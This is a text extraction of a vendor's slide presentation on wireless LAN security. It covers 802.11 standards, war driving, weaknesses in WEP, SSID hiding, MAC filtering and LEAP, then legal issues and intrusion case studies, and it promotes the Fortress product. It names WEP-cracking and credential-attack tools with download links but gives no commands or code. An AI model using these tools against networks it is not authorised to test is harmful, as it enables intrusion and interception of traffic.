Wireless LAN Security Threats

1
Wireless LAN SecurityThreats
CountermeasuresPresented By Joseph
TomasoneSenior Network Security
EngineerFortress Technologies, Inc.
2
Overview

• Wireless Networking 101
• Security Threats
• Security Solutions
• Legal Aspects
• Case Studies

3
Why use Wireless Networks?Mobility/Convenien
ceExtend physical network beyond wired
boundariesPrecludes expensive wiringFree
bandwidth!
4
Who uses wireless networks?Business
Industry (WLAN or W-Bridge)Consumer (Home
WLAN)Universities (Campus WLAN or
W-Bridge)Wireless ISPs (Wireless ISP
Access)Public Hotspots (Starbucks, Airports,
Hotels, etc.)Military Civil Agencies (WLAN,
W-Bridge)
5
Fact 802.11a and 802.11g are both 54Mbps, but
802.11g has greater range due to the lower
operating frequency.

• Wireless Networking 101
• Alphabet Soup
• 802.11b 2.4Ghz, 11Mbps
• 802.11a 5.8Ghz, 54Mbps
• 802.11g 2.4Ghz, 54Mbps
• 802.11i Security protocol for 802.11a/b/g

6
Wireless Networking 101 The Missing
Letters802.11 2.4Ghz, 2Mbps, FHSS802.11c
Bridge Operation Procedures802.11d Spec for
international operation802.11e QoS
(draft)802.11f Inter-Access Point Protocol
(IAPP)802.11h 5Ghz operation in Europe802.11j
4.9 GHz-5 GHz Operation in Japan (draft)
7
THREATS Attack him where he is unprepared,
appear when you are not expected. - Sun
Tzu, The Art Of War
8
Fact NetStumbler is only the best known of
several freeware tools on the Internet used to
discover WLANs.

• THREAT War Driving (also Stumbling or War
  Walking) is the practice of driving/walking
  through an area while using tools to discover
  wireless networks for possible attack or merely
  for sport.

9
Fact NetStumbler currently does not find APs
with SSID broadcasting disabled. Kismet does.

• Some War Driving Tools
• NetStumbler (Windows) www.netstumbler.com
• MiniStumbler (CE/PocketPC) www.netstumbler.com
• Kismet (Linux/Unix) www.kismetwireless.net
• Wellenreiter (Linux/Unix) www.remote-exploit.org
• URL of interest http//www.netstumbler.com be
  sure to check out the forums area.

10
Fact Wireless Sniffing is passive in nature, and
is therefore undetectable.

• Threats
• Wired Network Compromise
• Wireless Network Compromise
• Wired Network Abuse (Third Party)
• Theft of Service (WISP)
• Interception of Traffic (Wireless Sniffing)
• Hotspot Hijinks

11
COUNTERMEASURES You can be sure of succeeding
in your attacks if you only attack places which
are weakly defended. You can ensure the safety
of your defense if you only hold positions that
cannot be attacked. - Sun Tzu, The Art
Of War
12
WLAN Security Survival Checklist

• (Or, how to not get voted off the Island)
• Strong Encryption at Layer 2
• Authentication above and beyond the usual
• Access Control that lets you sleep at night
• Secures all of your WLAN devices
• Keep in mind - wireless is a unique security
  environment with unique security requirements.

13
When is Encryption Weak?

• When the encryption is not appropriate to the
  task at hand divulges information it shouldnt
• When the encryption protocol has already
  demonstrated vulnerabilities
• When the encryption algorithm has weak properties
• When the key exchange methodology is weak or too
  cumbersome to implement properly
• When its not active all the time and/or must be
  started by the end user

14
When is Authentication Weak?

• When the username or password are not encrypted
  or are merely hashed
• When the authentication cannot prevent password
  guessing attacks
• When single factor authentication is employed
• When users can compromise the network by
  disclosing credentials

15
When is Access Control Weak?

• When access is granted based solely on
  authentication
• When access cannot be revoked immediately

16
Fact 128 bit WEP is not officially part of the
standard, and some manufacturers key entry
methods are incompatible.

• COUNTERMEASURES
• Wired Equivalent Privacy (WEP)
• (Or, A New Look at an Old Friend)
• IEEE security for 802.11 built in!
• Problem Uses RC4 encryption, known weak keys
• Problem Only ONE key! Never changed!
• Problem No authentication
• Problem Access Control based on shared
  credential that is difficult to invalidate
• Problem Protocol has several known
  vulnerabilities
• Exploit code available
• AirSnort http//airsnort.shmoo.com
• But wait! Didnt the manufacturers eliminate
  weak IVs?
• AirCrack http//www.cr0.net8040/code/network/air
  crack
• WepLab http//weplab.sourceforge.net

17
Fact ESSID-Jack, a freeware tool, can expose a
hidden SSID in seconds.

• COUNTERMEASURES
• Closed Network Access Control
• (Disabling Broadcast SSID)
• First introduced by Lucent
• Blanks SSID field in 802.11 Beacon Frame
• Disables response to Any Probe Request
• No SSID, no association, right?
• Problem SSID is broadcast in all client
  association frames in the clear.
• Problem Tools can force a client to disassociate
  and re-associate to expose the SSID.
  (http//sourceforge.net/projects/airjack)

18
Fact Studies in major cities consistently show
that on average, less than 50 of WLANs have any
security at all.

• COUNTERMEASURES
• MAC Address Filtering
• Enter authorized MACs in (each!) AP
• Dont have a valid MAC, you cant get in, right?
• Problem MACs are easily sniffed, and all
  wireless NIC drivers currently allow you to
  specify the MAC you wish to use.
• Never has so much been done by so many for so
  long for so little result

19
Fact Prominent companies that have experienced
WLAN security breaches include Best Buy and Lowes

• COUNTERMEASURES
• LEAP (Cisco)
• Username/Password required for access
• WEP keys rotate, making AirSnort useless
• Problem Use of MS-CHAPv2 exposes credentials to
  devastating and efficient dictionary attack
• http//asleap.sourceforge.net

20
Fact Despite being a standard, IPSec suffers
from interoperability issues due to differing
vendor implementations.

• COUNTERMEASURES
• IPSec Overlay
• Plan B after WEP was cracked.
• Problems
• 1. Broadcast frames unencrypted
• 2. ARP poisoning DoS attack
• 3. WLAN must be subnetted
• 4. Client protection only after authentication

21
WLAN Traffic Unprotected
22
WLAN Traffic IPSec
23
WLAN Traffic Fortress
24
Fact WPA has a security mechanism built in to
help prevent against authentication attacks. It
shuts the AP down completely for 60 seconds.

• COUNTERMEASURES
• 802.1x WPA/802.11i
• Present IEEE standards for WLAN security.
• Problems!
• Single factor authentication (with few
  exceptions)
• Access control based solely on authentication
• Reliance on 802.1x and multiple EAP types offer
  questionable security and vendor
  incompatibilities (Protocol, not product)
• Backwards security architecture leads to
  password guessing attacks
• Security policy pre-defined for you!
• Multiple device security audit

25
Fact The AirFortress is used in the largest
known WLAN security deployment 11,000 APs
85,000 users. (U.S. Army)

• COUNTERMEASURES
• Fortress
• Layer 2 encryption with DES/3DES/AES
  (128/192/256)
• Supports all layer 3 protocols, roaming, etc.
• Three Factor Authentication (network, device,
  user)
• Clients for Win32/WinCE/PocketPC/PalmOS/DOS/Linux
• Compression for data security and performance
• FIPS, SPOCK, i-TRM, TISCOM certified

26
Fact There is no known Federal case law on point
that prohibits wireless sniffing. Some State
laws are broad enough to include it.

• Legal Aspects
• Regulations HIPAA, SOX, GLBA, FIPS
• Sniffing Legal? Illegal? Moot point.
• Network Intrusion Intent questions Windows XP
  Freenets
• System Intrusion Covered by statues, but to what
  end?

27
Fact Wireless Security issues have forced the
shutdown of WLANs in military, civil, and
commercial entities.

• Legal Aspects
• Probable Cause Any laptop/PDA with a wireless
  card?
• Warrant Arrest
• Location, location, location
• The time factor

28
Fact Stefan Puffer is the first known individual
to be charged with a computer intrusion through a
WLAN.

• Case Studies Stefan Puffer
• Worked for Harris County, TX as a security
  consultant in 1999
• In 2002, notified Harris County officials that an
  insecure WLAN was operating at the County Court
  and demonstrated same to County Central
  Technology chief and Houston Chronicle Reporter

29
Fact Puffer faced a total of 10 years in jail
and a 500,000 fine for his actions.

• Case Studies Stefan Puffer
• District Clerk files complaint alleging 5000 in
  damages (forensic costs) Puffer is arrested in 6
  a.m. forced entry warrant execution by FBI
• Charged with two counts of unauthorized access
  into a protected computer system and unauthorized
  access of a computer system used in justice
  administration"

30
Fact The District Clerk and the County Central
Technology head later blamed each other for
provoking the incident.

• Case Studies Stefan Puffer
• District Clerk admits no confidential information
  was disclosed but required WLAN to be shut down
• Puffer acquitted by jury in near-record 15
  minutes

31
Fact Inventory Management is considered to be
the most prevalent wireless application at
present.

• Case Studies Best Buy Home Depot
• April, 2002 Message posted on Internet forum
  describing how hacker monitored his own credit
  card number being transmitted as he purchased an
  item at Best Buy
• May, 2002 Best Buy shuts down wireless cash
  registers at all stores

32
Fact Retailers have been using wireless LANs in
varying forms for well over 10 years.

• Case Studies Best Buy Home Depot
• May, 2002 Home Depot shuts down WLANs that
  appear to be leaking SQL queries. They are later
  reactivated with WEP.
• June, 2002 Best Buy reactivates wireless cash
  registers with unspecified security measures
  presumably WEP.

33
Fact A Lowes store in CA was shut down for one
day due to crash of POS system by Southfield
hackers.

• Case Study Lowes
• Oct/Nov 2003 Three men arrested for penetrating
  Lowes corporate network from the parking lot of
  Southfield, MI Lowes store
• Charged with causing damage to a protected
  computer system - maximum penalty 10 years in
  prison, 250,000 fine

34
Fact Lowes issued a statement essentially
saying that their strong security did not fail
them - they detected the intrusions.

• Case Study Lowes
• Gained access to Lowe's stores in Salina, Kan.
  Wilkesboro, N.C. Long Beach and Visalia, Calif.
  Louisville, Ky. Rapid City, S.D. and
  Gainesville, FL.
• Hired to installed sniffer software to log credit
  card numbers did so and compromised an
  unspecified number
• Guilty pleas and jail time in late 2004

35
Fact Hackers are favoring home WLANs due to lack
of security and monitoring coupled with fast
Internet connections

• Case Study Home WLAN intrusions
• Man arrested in Toronto while downloading child
  pornography via unsecured residential WLAN.
  Homeowner not indicted.
• FL homeowner questioned and eventually released
  concerning emailed death threat sent via
  unsecured residential WLAN.